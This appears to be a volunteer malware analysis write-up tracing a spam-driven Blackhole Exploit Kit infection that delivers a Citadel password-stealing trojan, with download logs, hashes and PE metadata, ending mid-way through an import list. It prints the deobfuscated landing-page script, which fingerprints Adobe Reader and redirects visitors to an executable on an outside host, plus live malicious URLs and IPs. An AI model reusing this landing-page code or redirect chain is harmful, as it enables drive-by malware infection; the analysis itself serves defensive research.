=========================================== #MalwareMustDie!!!!!!!!!! INFECTION OF CITADEL WITH BHEK BHEK IS USING PARAMETER e & f Exploit Method: AcroPDF.PDF Payload download Method: Msxml2.XMLHTTP Payload : Citadel/Trojan Password/InfoStealer VT: https://www.virustotal.com/file/7fc40b6b0ec44852da2017dc3aa37de88ed9c2f6a2d0d41d33652990b907de22/analysis/1350446004/ =========== Only VT6/43 !!!! ========== DrWeb : Trojan.PWS.Stealer.946 Norman : W32/Krypt.GB McAfee-GW-Edition : PWS-Zbot.gen.aln McAfee : PWS-Zbot.gen.aln Fortinet : W32/Kryptik.WDV!tr Panda : Suspicious file Summary: This trojan send the data of infected PC by crypted communication via HTTP to 108.178.59.34 (See network conn report below) And also downloading other malwares: * GET /Z2U.exe HTTP/1.0 Host: 3073.a.hostable.me * GET /PNV3Hbi.exe HTTP/1.0 Host: 85.18.21.252 ---------------------------- Set of infected file: ---------------------------- assure_numb_engineers.php 0f4f3526dd2bad681586a90fc579f6e2 index.html.2 ad967ba32c54c59db0f4a947410d96f2 js.js d20a786ec45f68eb56f15a589c566b27 js.js.1 d20a786ec45f68eb56f15a589c566b27 js.js.2 d20a786ec45f68eb56f15a589c566b27 LinkEdIn-Spam.eml d8c4d95479f7a1264457a8d1b5e5f457 update_flash_player.exe bb53221e4220466c876dbfad9cede066 PoC Pic: https://lh3.googleusercontent.com/-XdS_YZJvyKk/UH46i1qRPUI/AAAAAAAAGQk/H9mKzI08TLc/s541/004.jpg =========================================== FULL ANALYSYS / #MalwareMustDie / @unixfreaxjp =========================================== //Likedin Spam; http://pastebin.com/raw.php?i=n7rppRJY #Hint from @Xylit0l < Merci!!!!!!!! //infected url detected: ...Privately (LINE 170): Chase Mathis --------------------------------------- //download PoC --12:24:18-- http://www.nikecup.net/MSmxYk/index.html => `index.html.2' Resolving www.nikecup.net... 62.149.131.163 Connecting to www.nikecup.net|62.149.131.163|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 422 [text/html] 12:24:18 (15.01 MB/s) - `index.html.2' saved [422/422] -------------------------------- // cat the mess

Connecting to server...

---------------------------------- // fetch the js.js, noted: referer --user-agent="Mozilla/5.0 (X11; U; NetBSD i686)" --referer="http://www.nikecup.net/MSmxYk/index.html" --target"http://jbrnh.com/3ZKtSw8d/js.js" --12:30:38-- http://alpuyecamorelos.com/dycYbDyw/js.js => `js.js' Resolving alpuyecamorelos.com... 209.62.88.194 Connecting to alpuyecamorelos.com|209.62.88.194|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 73 [application/javascript] 12:30:38 (2.29 MB/s) - `js.js' saved [73/73] --12:31:06-- http://videorender.com.ar/kSWEngwv/js.js => `js.js.1' Resolving videorender.com.ar... 174.37.144.224 Connecting to videorender.com.ar|174.37.144.224|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 73 [application/javascript] 12:31:07 (2.49 MB/s) - `js.js.1' saved [73/73] --12:31:26-- http://jbrnh.com/3ZKtSw8d/js.js => `js.js.2' Resolving jbrnh.com... 184.168.101.248 Connecting to jbrnh.com|184.168.101.248|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 73 [application/x-javascript] 12:31:27 (2.33 MB/s) - `js.js.2' saved [73/73] // all same contents↑ ----------------------------- // cat the mess (js.js) document.location='http://108.178.59.34/links/assure_numb_engineers.php'; ---------------------------- // fetch the mess, noted: referer, user agent --user-agent="Mozilla/5.0 (X11; U; NetBSD i686)" --referer="http://www.nikecup.net/MSmxYk/index.html" --target="http://108.178.59.34/links/assure_numb_engineers.php" --12:32:46-- http://108.178.59.34/links/assure_numb_engineers.php => `assure_numb_engineers.php' Connecting to 108.178.59.34:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] 12:32:47 (65.45 KB/s) - `assure_numb_engineers.php' saved [27474] ---------------------------- // Voila..plugin Detect...in blurp..

-------------------------------------------------------- // deobfs the code try { var PluginDetect = { version : "0.7.8", name : "PluginDetect", handler : function (c, b, a){ return function (){ c(b, a) } } , isDefined : function (b){ return typeof b != "undefined" } , isArray : function (b){ return (/array/i).test(Object.prototype.toString.call(b)) } , isFunc : function (b){ return typeof b == "function" } , isString : function (b){ return typeof b == "string" } , isNum : function (b){ return typeof b == "number" } , isStrNum : function (b){ return (typeof b == "string" && (/\d/).test(b)) } , getNumRegx :/ [ \ d][ \ d \ . \ _ ,- ] */, splitNumRegx :/ [ \ . \ _ ,- ] / g, getNum : function (b, c){ var d = this , a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumRegx). exec(b) : null; return a ? a[0] : null } , compareNums : function (h, f, d){ var e = this , c, b, a, g = parseInt; if (e.isStrNum(h) && e.isStrNum(f)){ if (e.isDefined(d) && d.compareNums){ return d.compareNums(h, f) } c = h.split(e.splitNumRegx); b = f.split(e.splitNumRegx); for (a = 0; a < Math.min(c.length, b.length); a ++ ){ if (g(c[a], 10) > g(b[a], 10)){ return 1 } if (g(c[a], 10) < g(b[a], 10)){ return - 1 } } } return 0 } , formatNum : function (b, c){ var d = this , a, e; if (!d.isStrNum(b)){ return null } if (!d.isNum(c)){ c = 4 } c--; e = b.replace(/\s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]); for (a = 0; a < 4; a ++ ){ if (/^(0+)(.+)$/.test(e[a])){ e[a] = RegExp.$2 } if (a > c ||! (/\d/).test(e[a])){ e[a] = "0" } } return e.slice(0, 4).join(",") } , $$hasMimeType : function (a){ return function (c){ if (!a.isIE && c){ var f, e, b, d = a.isArray(c) ? c : (a.isString(c) ? [c] : []); for (b = 0; b < d.length; b ++ ){ if (a.isString(d[b]) &&/ [ ^\ s] / .test(d[b])){ f = navigator.mimeTypes[d[b]]; e = f ? f.enabledPlugin : 0; if (e && (e.name || e.description)){ return f } } } } return null } } , findNavPlugin : function (l, e, c){ var j = this , h = new RegExp(l, "i"), d = (!j.isDefined(e) || e) ?/\ d /: 0, k = c ? new RegExp(c, "i") : 0, a = navigator.plugins, g = "", f, b, m; for (f = 0; f < a.length; f ++ ){ m = a[f].description || g; b = a[f].name || g; if ((h.test(m) && (!d || d.test(RegExp.leftContext + RegExp.rightContext))) || (h. test(b) && (!d || d.test(RegExp.leftContext + RegExp.rightContext)))){ if (!k ||! (k.test(m) || k.test(b))){ return a[f] } } } return null } , getMimeEnabledPlugin : function (k, m, c){ var e = this , f, b = new RegExp(m, "i"), h = "", g = c ? new RegExp(c, "i") : 0, a, l, d, j = e.isString(k) ? [k] : k; for (d = 0; d < j.length; d ++ ){ if ((f = e.hasMimeType(j[d])) && (f = f.enabledPlugin)){ l = f.description || h; a = f.name || h; if (b.test(l) || b.test(a)){ if (!g ||! (g.test(l) || g.test(a))){ return f } } } } return 0 } , getPluginFileVersion : function (f, b){ var h = this , e, d, g, a, c =- 1; if (h.OS > 2 ||! f ||! f.version ||! (e = h.getNum(f.version))){ return b } if (!b){ return e } e = h.formatNum(e); b = h.formatNum(b); d = b.split(h.splitNumRegx); g = e.split(h.splitNumRegx); for (a = 0; a < d.length; a ++ ){ if (c >- 1 && a > c && d[a] != "0"){ return b } if (g[a] != d[a]){ if (c ==- 1){ c = a } if (d[a] != "0"){ return b } } } return e } , AXO : window.ActiveXObject, getAXO : function (a){ var f = null, d, b = this , c = { } ; try { f = new b.AXO(a) } catch (d){ } return f } , convertFuncs : function (f){ var a, g, d, b =/^ [ \ $][ \ $] /, c = this ; for (ain f){ if (b.test(a)){ try { g = a.slice(2); if (g.length > 0 &&! f[g]){ f[g] = f[a](f); deletef[a] } } catch (d){ } } } } , initObj : function (e, b, d){ var a, c; if (e){ if (e[b[0]] == 1 || d){ for (a = 0; a < b.length; a = a + 2){ e[b[a]] = b[a + 1] } } for (ain e){ c = e[a]; if (c && c[b[0]] == 1){ this .initObj(c, b) } } } } , initScript : function (){ var c = this , a = navigator, e = "/", f, i = a.userAgent || "", g = a.vendor || "", b = a.platform || "", h = a.product || ""; c.initObj(c, ["$", c]); for (fin c.Plugins){ if (c.Plugins[f]){ c.initObj(c.Plugins[f], ["$", c, "$$", c.Plugins[f]], 1) } } ; c.OS = 100; if (b){ var d = ["Win", 1, "Mac", 2, "Linux", 3, "FreeBSD", 4, "iPhone", 21.1, "iPod", 21.2, "iPad", 21.3, "Win.*CE", 22.1, "Win.*Mobile", 22.2, "Pocket\\s*PC", 22.3, "" , 100]; for (f = d.length - 2; f >= 0; f = f - 2){ if (d[f] && new RegExp(d[f], "i").test(b)){ c.OS = d[f + 1]; break } } } c.convertFuncs(c); c.head = (document.getElementsByTagName("head")[0] || document.getElementsByTagName( "body")[0] || document.body || null); c.isIE = (new Function("return " + e + "*@cc_on!@*" + e + "false"))(); c.verIE = c.isIE && (/MSIE\s*(\d+\.?\d*)/i).test(i) ? parseFloat(RegExp.$1, 10) : null ; c.ActiveXEnabled = false; if (c.isIE){ var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", "Scripting.Dictionary", "wmplayer.ocx"]; for (f = 0; f < j.length; f ++ ){ if (c.getAXO(j[f])){ c.ActiveXEnabled = true; break } } } c.isGecko = (/Gecko/i).test(h) && (/Gecko\s*\/\s*\d/i).test(i); c.verGecko = c.isGecko ? c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(i) ? RegExp.$1 : "0.9") : null; c.isChrome = (/Chrome\s*\/\s*(\d[\d\.]*)/i).test(i); c.verChrome = c.isChrome ? c.formatNum(RegExp.$1) : null; c.isSafari = ((/Apple/i).test(g) || (!g &&! c.isChrome)) && ( /Safari\s*\/\s*(\d[\d\.]*)/i).test(i); c.verSafari = c.isSafari && (/Version\s*\/\s*(\d[\d\.]*)/i).test(i) ? c.formatNum( RegExp.$1) : null; c.isOpera = (/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(i); c.verOpera = c.isOpera && ((/Version\s*\/\s*(\d+\.?\d*)/i).test(i) || 1) ? parseFloat(RegExp.$1, 10) : null; c.addWinEvent("load", c.handler(c.runWLfuncs, c)) } , init : function (d){ var c = this , b, d, a = { status :- 3, plugin : 0 } ; if (!c.isString(d)){ return a } if (d.length == 1){ c.getVersionDelimiter = d; return a } d = d.toLowerCase().replace(/\s/g, ""); b = c.Plugins[d]; if (!b ||! b.getVersion){ return a } a.plugin = b; if (!c.isDefined(b.installed)){ b.installed = null; b.version = null; b.version0 = null; b.getVersionDone = null; b.pluginName = d } c.garbage = false; if (c.isIE &&! c.ActiveXEnabled && d !== "java"){ a.status =- 2; return a } a.status = 1; return a } , fPush : function (b, a){ var c = this ; if (c.isArray(a) && (c.isFunc(b) || (c.isArray(b) && b.length > 0 && c.isFunc(b[0 ])))){ a.push(b) } } , callArray : function (b){ var c = this , a; if (c.isArray(b)){ for (a = 0; a < b.length; a ++ ){ if (b[a] === null){ return } c.call(b[a]); b[a] = null } } } , call : function (c){ var b = this , a = b.isArray(c) ? c.length :- 1; if (a > 0 && b.isFunc(c[0])){ c[0](b, a > 1 ? c[1] : 0, a > 2 ? c[2] : 0, a > 3 ? c[3] : 0) } else { if (b.isFunc(c)){ c(b) } } } , getVersionDelimiter : ",", $$getVersion : function (a){ return function (g, d, c){ var e = a.init(g), f, b, h = { } ; if (e.status < 0){ return null } ; f = e.plugin; if (f.getVersionDone != 1){ f.getVersion(null, d, c); if (f.getVersionDone === null){ f.getVersionDone = 1 } } a.cleanup(); b = (f.version || f.version0); b = b ? b.replace(a.splitNumRegx, a.getVersionDelimiter) : b; return b } } , cleanup : function (){ } , addWinEvent : function (d, c){ var e = this , a = window, b; if (e.isFunc(c)){ if (a.addEventListener){ a.addEventListener(d, c, false) } else { if (a.attachEvent){ a.attachEvent("on" + d, c) } else { b = a["on" + d]; a["on" + d] = e.winHandler(c, b) } } } } , winHandler : function (d, c){ return function (){ d(); if (typeof c == "function"){ c() } } } , WLfuncs0 : [], WLfuncs : [], runWLfuncs : function (a){ var b = { } ; a.winLoaded = true; a.callArray(a.WLfuncs0); a.callArray(a.WLfuncs); if (a.onDoneEmptyDiv){ a.onDoneEmptyDiv() } } , winLoaded : false, $$onWindowLoaded : function (a){ return function (b){ if (a.winLoaded){ a.call(b) } else { a.fPush(b, a.WLfuncs) } } } , div : null, divID : "plugindetect", divWidth : 50, pluginSize : 1, emptyDiv : function (){ var d = this , b, h, c, a, f, g; if (d.div && d.div.childNodes){ for (b = d.div.childNodes.length - 1; b >= 0; b -- ){ c = d.div.childNodes[b]; if (c && c.childNodes){ for (h = c.childNodes.length - 1; h >= 0; h -- ){ g = c.childNodes[h]; try { c.removeChild(g) } catch (f){ } } } if (c){ try { d.div.removeChild(c) } catch (f){ } } } } if (!d.div){ a = document.getElementById(d.divID); if (a){ d.div = a } } if (d.div && d.div.parentNode){ try { d.div.parentNode.removeChild(d.div) } catch (f){ } d.div = null } } , DONEfuncs : [], onDoneEmptyDiv : function (){ var c = this , a, b; if (!c.winLoaded){ return } if (c.WLfuncs && c.WLfuncs.length && c.WLfuncs[c.WLfuncs.length - 1] !== null){ return } for (ain c){ b = c[a]; if (b && b.funcs){ if (b.OTF == 3){ return } if (b.funcs.length && b.funcs[b.funcs.length - 1] !== null){ return } } } for (a = 0; a < c.DONEfuncs.length; a ++ ){ c.callArray(c.DONEfuncs) } c.emptyDiv() } , getWidth : function (c){ if (c){ var a = c.scrollWidth || c.offsetWidth, b = this ; if (b.isNum(a)){ return a } } return - 1 } , getTagStatus : function (m, g, a, b){ var c = this , f, k = m.span, l = c.getWidth(k), h = a.span, j = c.getWidth(h), d = g.span, i = c.getWidth(d); if (!k ||! h ||! d ||! c.getDOMobj(m)){ return - 2 } if (j < i || l < 0 || j < 0 || i < 0 || i <= c.pluginSize || c.pluginSize < 1){ return 0 } if (l >= i){ return - 1 } try { if (l == c.pluginSize && (!c.isIE || c.getDOMobj(m).readyState == 4)){ if (!m.winLoaded && c.winLoaded){ return 1 } if (m.winLoaded && c.isNum(b)){ if (!c.isNum(m.count)){ m.count = b } if (b - m.count >= 10){ return 1 } } } } catch (f){ } return 0 } , getDOMobj : function (g, a){ var f, d = this , c = g ? g.span : 0, b = c && c.firstChild ? 1 : 0; try { if (b && a){ d.div.focus() } } catch (f){ } return b ? c.firstChild : null } , setStyle : function (b, g){ var f = b.style, a, d, c = this ; if (f && g){ for (a = 0; a < g.length; a = a + 2){ try { f[g[a]] = g[a + 1] } catch (d){ } } } } , insertDivInBody : function (a, i){ var h, f = this , b = "pd33993399", d = null, j = i ? window.top.document : window. document, c = "<", g = (j.getElementsByTagName("body")[0] || j.body); if (!g){ try { j.write(c + 'div id="' + b + '">o' + c + "/div>"); d = j.getElementById(b) } catch (h){ } } g = (j.getElementsByTagName("body")[0] || j.body); if (g){ if (g.firstChild && f.isDefined(g.insertBefore)){ g.insertBefore(a, g.firstChild) } else { g.appendChild(a) } if (d){ g.removeChild(d) } } else { } } , insertHTML : function (g, b, h, a, l){ var m, n = document, k = this , q, p = n.createElement("span"), o, j, f = "<"; var c = ["outlineStyle", "none", "borderStyle", "none", "padding", "0px", "margin", "0px", "visibility", "visible"]; var i = "outline-style:none;border-style:none;padding:0px;margin:0px;visibility:visible;"; if (!k.isDefined(a)){ a = "" } if (k.isString(g) && (/[^\s]/).test(g)){ g = g.toLowerCase().replace(/\s/g, ""); q = f + g + ' width="' + k.pluginSize + '" height="' + k.pluginSize + '" '; q += 'style="' + i + 'display:inline;" '; for (o = 0; o < b.length; o = o + 2){ if (/[^\s]/.test(b[o + 1])){ q += b[o] + '="' + b[o + 1] + '" ' } } q += ">"; for (o = 0; o < h.length; o = o + 2){ if (/[^\s]/.test(h[o + 1])){ q += f + 'param name="' + h[o] + '" value="' + h[o + 1] + '" />' } } q += a + f + "/" + g + ">" } else { q = a } if (!k.div){ j = n.getElementById(k.divID); if (j){ k.div = j } else { k.div = n.createElement("div"); k.div.id = k.divID } k.setStyle(k.div, c.concat(["width", k.divWidth + "px", "height", (k.pluginSize + 3) + "px", "fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k.pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "block"])); if (!j){ k.setStyle(k.div, ["position", "absolute", "right", "0px", "top", "0px"]); k.insertDivInBody(k.div) } } if (k.div && k.div.parentNode){ k.setStyle(p, c.concat(["fontSize", (k.pluginSize + 3) + "px", "lineHeight", (k. pluginSize + 3) + "px", "verticalAlign", "baseline", "display", "inline"])); try { p.innerHTML = q } catch (m){ } ; try { k.div.appendChild(p) } catch (m){ } ; return { span : p, winLoaded : k.winLoaded, tagName : g, outerHTML : q } } return { span : null, winLoaded : k.winLoaded, tagName : "", outerHTML : q } } , Plugins : { adobereader : { mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF", "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED : { } , pluginHasMimeType : function (d, c, f){ var b = this , e = b.$, a; for (ain d){ if (d[a] && d[a].type && d[a].type == c){ return 1 } } if (e.getMimeEnabledPlugin(c, f)){ return 1 } return 0 } , getVersion : function (l, j){ var g = this , d = g.$, i, f, m, n, b = null, h = null, k = g.mimeType, a, c; if (d.isString(j)){ j = j.replace(/\s/g, ""); if (j){ k = j } } else { j = null } if (d.isDefined(g.INSTALLED[k])){ g.installed = g.INSTALLED[k]; return } if (!d.isIE){ a = "Adobe.*PDF.*Plug-?in|Adobe.*Acrobat.*Plug-?in|Adobe.*Reader.*Plug-?in"; if (g.getVersionDone !== 0){ g.getVersionDone = 0; b = d.getMimeEnabledPlugin(g.mimeType, a); if (!j){ n = b } if (!b && d.hasMimeType(g.mimeType)){ b = d.findNavPlugin(a, 0) } if (b){ g.navPluginObj = b; h = d.getNum(b.description) || d.getNum(b.name); h = d.getPluginFileVersion(b, h); if (!h && d.OS == 1){ if (g.pluginHasMimeType(b, "application/vnd.adobe.pdfxml", a)){ h = "9" } else { if (g.pluginHasMimeType(b, "application/vnd.adobe.x-mars", a)){ h = "8" } } } } } else { h = g.version } if (!d.isDefined(n)){ n = d.getMimeEnabledPlugin(k, a) } g.installed = n && h ? 1 : (n ? 0 : (g.navPluginObj ?- 0.2 :- 1)) } else { b = d.getAXO(g.progID[0]) || d.getAXO(g.progID[1]); c =/=\ s * ([ \ d \ .] + ) / g; try { f = (b || d.getDOMobj(d.insertHTML("object", ["classid", g.classID], ["src", ""], "", g))).GetVersions(); for (m = 0; m < 5; m ++ ){ if (c.test(f) && (!h || RegExp.$1 > h)){ h = RegExp.$1 } } } catch (i){ } g.installed = h ? 1 : (b ? 0 :- 1) } if (!g.version){ g.version = d.formatNum(h) } g.INSTALLED[k] = g.installed } } , zz : 0 } } ; PluginDetect.initScript(); PluginDetect.getVersion("."); pdfver = PluginDetect.getVersion("AdobeReader"); } catch (e){ } if (typeof pdfver == 'string'){ pdfver = pdfver.split('.') } else { pdfver = [0, 0, 0, 0] } function x(s){ d = []; for (i = 0; i < s.length; i ++ ){ k = (s.charCodeAt(i) - 46).toString(16); if (k.length == 1)k = "0" + k; d.push(k); } ; return d.join(""); } end_redirect = function (){ window.location.href = 'http://108.178.59.34/adobe/update_flash_player.exe'; } ; window.onbeforeunload = function (){ return ""; } ; document.write(''); setTimeout(end_redirect, 60000); ------------------------------------ // infection analysis per exploit & PluginDetect hint.. =================== EXPLOIT-ED BY: =================== // , Plugins : { // adobereader : { // mimeType : "application/pdf", navPluginObj : null, progID : ["AcroPDF.PDF", // "PDF.PdfCtrl"], classID : "clsid:CA8A9780-280D-11CF-A24D-444553540000", INSTALLED : =================== DOWNLOADED VIA: =================== // var f, j = ["Msxml2.XMLHTTP", "Msxml2.DOMDocument", "Microsoft.XMLDOM", // "ShockwaveFlash.ShockwaveFlash", "TDCCtl.TDCCtl", "Shell.UIHelper", // "Scripting.Dictionary", "wmplayer.ocx"]; // for (f = 0; f < j.length; f ++ ){ // if (c.getAXO(j[f])){ // c.ActiveXEnabled = true; // break *********** Please be noted parameter = var f, j ***************** =================== TO URL: =================== // end_redirect = function (){ // window.location.href = 'http://108.178.59.34/adobe/update_flash_player.exe';} // --------------download PoC------------------------------------------------ --user-agent="Mozilla/5.0 (X11; U; NetBSD i686)" --referer="http://108.178.59.34/links/assure_numb_engineers.php" --target="http://108.178.59.34/adobe/update_flash_player.exe" --12:40:16-- http://108.178.59.34/adobe/update_flash_player.exe => `update_flash_player.exe' Connecting to 108.178.59.34:80... connected. HTTP request sent, awaiting response... 200 OK Length: 150,616 (147K) [application/octet-stream] 12:40:18 (139.15 KB/s) - `update_flash_player.exe' saved [150616/150616] <==== CITADEL PAYLOAD ---------------INFECTION CROSS REFERENCE AUTOMATION------------------ [2012-10-17 12:42:46] [MongoDB] MongoDB instance not available [2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Status: 200, Referrer: None) [2012-10-17 12:42:47] [HTTP] URL: http://www.nikecup.net/MSmxYk/index.html (Content-type: text/html, MD5: ad967ba32c54c59db0f4a947410d96f2) [2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html) [2012-10-17 12:42:52] [HTTP] URL: http://alpuyecamorelos.com/dycYbDyw/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27) [2012-10-17 12:42:52] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php [2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html) [2012-10-17 12:42:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb) [2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html) [2012-10-17 12:43:04] [HTTP] URL: http://videorender.com.ar/kSWEngwv/js.js (Content-type: application/javascript, MD5: d20a786ec45f68eb56f15a589c566b27) [2012-10-17 12:43:04] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php [2012-10-17 12:43:04] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html) [2012-10-17 12:43:04] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb) [2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Status: 200, Referrer: http://www.nikecup.net/MSmxYk/index.html) [2012-10-17 12:43:41] [HTTP] URL: http://jbrnh.com/3ZKtSw8d/js.js (Content-type: application/x-javascript, MD5: d20a786ec45f68eb56f15a589c566b27) [2012-10-17 12:43:41] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php [2012-10-17 12:43:42] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html) [2012-10-17 12:43:42] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb) [2012-10-17 12:43:51] [HREF Redirection (document.location)] Content-Location: http://www.nikecup.net/MSmxYk/index.html --> Location: http://108.178.59.34/links/assure_numb_engineers.php [2012-10-17 12:43:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Status: 403, Referrer: http://www.nikecup.net/MSmxYk/index.html) [2012-10-17 12:43:52] [HTTP] URL: http://108.178.59.34/links/assure_numb_engineers.php (Content-type: text/html, MD5: bc56979a0b381a791dd59713198a87fb) ----------------------------- 0000 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 MZ.............. 0010 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0030 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 ................ 0040 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 ........!..L.!Th 0050 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F is program canno 0060 74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20 t be run in DOS 0070 6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00 mode....$....... 0080 50 45 00 00 4C 01 04 00 2A 26 7E 50 00 00 00 00 PE..L...*&~P.... 0090 00 00 00 00 E0 00 0E 01 0B 01 02 32 00 A6 01 00 ...........2.... Bin: //Pic: // faking windoz app: UninitializedDataSize....: 0 InitializedDataSize......: 23040 ImageVersion.............: 0.0 ProductName..............: Microsoft(R) Windows (R) 2000 Operating System FileVersionNumber........: 5.0.2137.1 LanguageCode.............: English (U.S.) FileFlagsMask............: 0x003f FileDescription..........: Windows TaskManager CharacterSet.............: Unicode LinkerVersion............: 2.5 FileOS...................: Windows NT 32-bit MIMEType.................: application/octet-stream Subsystem................: Windows GUI FileVersion..............: 5.00.2137.1 TimeStamp................: 2012:10:17 04:29:46+01:00 FileType.................: Win32 EXE PEType...................: PE32 InternalName.............: taskmgr ProductVersion...........: 5.00.2137.1 SubsystemVersion.........: 4.0 OSVersion................: 4.0 OriginalFilename.........: taskmgr.exe LegalCopyright...........: Copyright (C) Microsoft Corp. 1991-1999 MachineType..............: Intel 386 or later, and compatibles CompanyName..............: Microsoft Corporation CodeSize.................: 108032 FileSubtype..............: 0 ProductVersionNumber.....: 5.0.2137.1 EntryPoint...............: 0x1ef0 ObjectFileType...........: Executable application //Sigcheck publisher................: Microsoft Corporation product..................: Microsoft(R) Windows (R) 2000 Operating System internal name............: taskmgr copyright................: Copyright (C) Microsoft Corp. 1991-1999 original name............: taskmgr.exe file version.............: 5.00.2137.1 description..............: Windows TaskManager .text 4096 107728 108032 7.49 7bb7c23fbff31a0f4dc8c2082f47d453 .data 114688 13048 12800 1.62 bfd92f96b4b275e9bdc8941a0ac85831 .rsrc 131072 8368 8704 3.36 210a8ec34d58b64a2531c59aa8344586 .reloc 143360 516 1024 3.94 1841b4a61bd8a2498e642d7a36c6d596 Compiled by: Borland Delphi 3.0 Compile Time: 2012-10-17 12:29:46 Packed entropy: Entropy 7.48782313568 Name: .text Misc: 0x1A4D0 Misc_PhysicalAddress: 0x1A4D0 Misc_VirtualSize: 0x1A4D0 VirtualAddress: 0x1000 SizeOfRawData: 0x1A600 PointerToRawData: 0x400 PointerToRelocations: 0x0 PointerToLinenumbers: 0x0 NumberOfRelocations: 0x0 NumberOfLinenumbers: 0x0 Characteristics: 0x60000020 LangID: 040904B0 LegalCopyright: Copyright (C) Microsoft Corp. 1991-1999 InternalName: taskmgr FileVersion: 5.00.2137.1 CompanyName: Microsoft Corporation ProductName: Microsoft(R) Windows (R) 2000 Operating System ProductVersion: 5.00.2137.1 FileDescription: Windows TaskManager OriginalFilename: taskmgr.exe ------------------ imported calls DLL ------------------- 0041EA0C GetCPInfo KERNEL32 0041EA10 VirtualAlloc KERNEL32 0041EA14 LoadLibraryA KERNEL32 0041EA18 GetProcAddress KERNEL32 0041EA1C GetWindowsDirectoryW KERNEL32 0041EA20 lstrcatW KERNEL32 0041EA24 CreateFileW KERNEL32 0041EA2C LoadIconA USER32 0041EA30 CreateIconIndirect USER32 0041EA34 GetDlgCtrlID USER32 0041EA38 GetScrollPos USER32 0041EA3C RegisterDeviceNotificationA USER32 0041EA40 DdeEnableCallback USER32 0041EA44 DrawStateA USER32 0041EA48 MessageBoxIndirectW USER32 0041EA4C LoadMenuA USER32 0041EA50 GetTabbedTextExtentA USER32 0041EA54 UnpackDDElParam USER32 0041EA58 DialogBoxIndirectParamW USER32 0041EA5C ToAsciiEx USER32 0041EA60 IsWindow USER32 0041EA64 LoadKeyboardLayoutA USER32 0041EA68 GetCursor USER32 0041EA6C UserHandleGrantAccess USER32 0041EA70 GetMenuState USER32 0041EA74 SetMenuItemInfoA USER32 0041EA78 TabbedTextOutW USER32 0041EA7C mouse_event USER32 0041EA80 DdeSetUserHandle USER32 0041EA84 SetWindowWord USER32 0041EA88 SetDlgItemTextW USER32 0041EA8C IsMenu USER32 0041EA90 SetWindowTextW USER32 0041EA94 GetSystemMenu USER32 0041EA98 RegisterClassA USER32 0041EA9C ChangeDisplaySettingsExW USER32 0041EAA0 SetMenuInfo USER32 0041EAA4 GetKeyState USER32 0041EAA8 ChildWindowFromPoint USER32 0041EAAC LoadCursorFromFileW USER32 0041EAB0 SendMessageCallbackA USER32 0041EAB4 DdeKeepStringHandle USER32 0041EAB8 FlashWindow USER32 0041EABC OpenIcon USER32 0041EAC0 CreateMenu USER32 0041EAC4 FindWindowW USER32 0041EAC8 GetIconInfo USER32 0041EACC GetWindowInfo USER32 0041EAD0 IsCharAlphaNumericA USER32 0041EAD4 FrameRect USER32 0041EAD8 FlashWindowEx USER32 0041EADC SetSysColors USER32 0041EAE0 GetCapture USER32 0041EAE4 DdeGetLastError USER32 0041EAE8 SetWindowsHookA USER32 0041EAEC PostThreadMessageA USER32 0041EAF0 TranslateMessage USER32 0041EAF4 GetDlgItemTextA USER32 0041EAF8 GetShellWindow USER32 0041EAFC CreateAcceleratorTableW USER32 0041EB00 DrawMenuBar USER32 0041EB04 DdeDisconnect USER32 0041EB08 SetClipboardData USER32 0041EB0C CreateDialogParamW USER32 0041EB10 ToUnicodeEx USER32 0041EB14 CreatePopupMenu USER32 0041EB18 